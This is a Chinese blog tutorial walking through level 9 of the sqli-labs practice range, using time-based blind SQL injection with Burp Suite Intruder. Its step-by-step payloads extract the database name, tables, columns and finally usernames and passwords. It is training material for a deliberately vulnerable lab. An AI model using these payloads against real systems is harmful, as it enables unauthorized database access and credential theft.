Java教程

sqli靶场通关之less9

本文主要是介绍sqli靶场通关之less9,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

sqli

less9

时间盲注 结合burpsuite

  • 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。
1. 求闭合字符
id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了
  • 查看源码,证实了猜测,尝试使用时间盲注

image-20210623225615974

id=1 and sleep(5) //未延迟
id=1' and sleep(5) //延迟(明显加载慢了几秒)
  • 判断闭合字符为单引号
2. 求数据库名长度
id=1' and if (length(database())>5 ,sleep(5),1) -- + //明显延迟
id=1' and if (length(database())<10 ,sleep(5),1) -- +//明显延迟
id=1' and if (length(database())=6 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=7 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=8 ,sleep(5),1) -- +//明显延迟
  • 判断出数据库名长度为8
3. 求数据库名对应的ascii值
  • 结合burpsuite的重放攻击,设置2个payload
id=1' and if(ascii(substr(database(),1,1))=1,sleep(5),1) -- +

  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量。

image-20210624002252466

image-20210624002328873

  • 设置字典

image-20210624002356343

image-20210624002427736

  • 点击攻击,查看结果

image-20210624002458766

  • 按照顺序对应:security
4. 求表的个数
  • 结合burpsuite的重放攻击,设置1个paylod
id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=1,sleep(5),1) -- +
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量。

image-20210624003257484

image-20210624003342825

  • 设置字典

image-20210624003036164

  • 点击攻击,完成攻击查看结果

image-20210624003424009

  • 该数据库中有4个表
5. 求表的长度
  • 结合burpsuite的重放攻击,设置2个paylod
id=1' and if((length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1),sleep(5),1) -- +
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624004053208

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jguWJlnd-1626704143260)(实验六.assets/image-20210624004112935.png)]

  • 设置字典

image-20210624003841328

image-20210624003855007

  • 点击攻击,完成攻击后查看结果

image-20210624004003904

  • 得出4个表对应的长度分别为:6,8,7,5
6. 求表对应的ascii码
  • 结合burpsuite的重放攻击,设置3个paylod
id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1),sleep(5),1) -- +
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624004454512

image-20210624004509048

  • 设置字典

image-20210624004526467

image-20210624004543300

image-20210624004603442

  • 点击攻击,完成攻击查看结果

image-20210624005133441

  • 根据ascii码表得出4个表分别是:emails,referers,uagents,users
7. 求列的个数
  • 结合上文,推测users表是我们想要爆破的用户密码表

  • 结合burpsuite的重放攻击,设置1个paylod

id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=1,sleep(5),1) --+
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624005915512

  • 设置字典

image-20210624005902419

  • 点击攻击,完成攻击查看结果

image-20210624005833704

  • 得出有3列
8. 求列的长度
  • 结合burpsuite的重放攻击,设置2个paylod
id=1' and if((length(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=1),sleep(5),1) --+
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624010400107

image-20210624010414142

  • 设置字典

image-20210624010431795

image-20210624010446464

  • 点击攻击,完成攻击查看结果

image-20210624010501666

9. 求列对应的ascii码
  • 结合burpsuite的重放攻击,设置3个paylod
id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=1),sleep(5),1) --+
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624011026883

image-20210624011041411

  • 设置字典

image-20210624011105054

image-20210624011121614

image-20210624011138703

  • 点击攻击,完成攻击查看结果

image-20210624011431343

  • 分别对应的:id,username,password
10. 求字段记录的个数
  • 结合burpsuite的重放攻击,设置1个paylod
id=1' and if((select count(username) from security.users)=1,sleep(5),1) --+
id=1' and (select count(username) from security.users)=1 -- +
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624011951884

image-20210624012005987

  • 设置字典

image-20210624011937290

  • 点击攻击,完成攻击查看结果

image-20210624011907204

  • 共13条记录
11. 求字段记录的长度
  • 结合burpsuite的重放攻击,设置2个paylod
id=1' and if((length(substr((select concat(username,password) from security.users limit 0,1),1))=1),sleep(5),1) --+
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624013223794

image-20210624013251833

  • 设置字典

image-20210624013151917

image-20210624013205404

  • 点击攻击,完成攻击查看结果

image-20210624012949568

  • 可以看到分别对应的字段长度,比如第一二行:8,18
12. 求字段记录对应的asccii码
  • 结合burpsuite的重放攻击,设置3个paylod
id=1' and if((ascii(substr((select concat(username,password) from security.users limit 0,1),1,1))=1),sleep(5),1) --+
  • 利用BurpSuite抓包,并发送到Inturder,设置攻击类型和变量.

image-20210624013913630

image-20210624013926421

  • 设置字典

image-20210624014001063

image-20210624014014071

image-20210624014032150

  • 点击攻击,完成攻击查看结果

image-20210624014819273

  • 第一行:Dumb Dumb
  • 第二行:Angelina I-kill-you
这篇关于sqli靶场通关之less9的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!